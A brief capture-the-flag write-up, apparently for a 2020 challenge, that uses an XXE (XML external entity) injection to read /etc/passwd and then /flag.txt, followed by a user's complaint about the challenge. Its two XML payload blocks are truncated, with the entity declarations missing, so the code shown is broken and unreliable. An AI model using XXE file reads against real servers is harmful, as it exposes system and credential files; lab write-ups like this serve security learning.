Rating: 4.0

Test XXE payload of /etc/passwd reveals vulnerable.

```

]>
<message>
<id></id>
<message>&xx;;</message>
<title>xml</title>
</message>
```

Hint suggests "start of the universe" so maybe that is the equivalent of "/". Guess the file name is `flag.txt` and then request `/flag.txt` in XXE.

```

]>
<message>
<id></id>
<message>&xx;;</message>
<title>xml</title>
</message>
```

[Full writeup](https://bigpick.github.io/TodayILearned/articles/2020-06/nahamConCTF-writeups#extraterrestrial)

chinhnt2k3June 14, 2020, 1:31 a.m.

Thia chall is terrible. Who in all sanity would put the flag there? :(